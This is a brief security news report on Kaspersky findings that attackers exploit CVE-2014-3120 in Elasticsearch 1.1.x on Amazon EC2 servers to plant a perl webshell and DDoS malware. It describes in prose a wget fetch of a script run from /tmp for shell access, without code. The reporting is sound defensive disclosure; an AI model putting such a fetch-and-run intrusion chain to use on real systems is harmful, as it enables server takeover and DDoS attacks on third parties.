Security professionals usually don’t have to worry about the search engines their organizations chose for plowing through corporate data.
But researchers at Kaspersky Labs say attackers are exploiting a vulnerability in the open source Elasticsearch engine to install distributed denial of service (DDoS) malware on Amazon and possibly other cloud servers.
The problem is in Elasticsearch v. 1.1x and a scripting exploit. Users are urged to upgrade to version 1.2 or 1.3, which have dynamic scripting turned off by default.
Computerworld quotes a Kaspersky researcher saying attackers break into virtual machines run by Amazon EC2 customers by exploiting the vulnerability in Elasticsearch 1.1.x.
The attackers re-purpose known cve-2014-3120 proof-of-concept exploit code to deliver a perl webshell, Kaspersky says. “Gaining this foothold presents the attacker with bash shell access on the server. The script “pack.pl” is fetched with wget and saved from the web host above to /tmp/zerl and run from there, providing the bash shell access to the attacker. Events in your index logs may suggest your server has fallen to this attack,” says Kaspersky’s Kurt Baumgartner.
The result is a high flow of UDP traffic, he wrote in a blog. But already the list of the DDoS victims include a large regional U.S. bank, a large electronics maker and a service provider in Japan.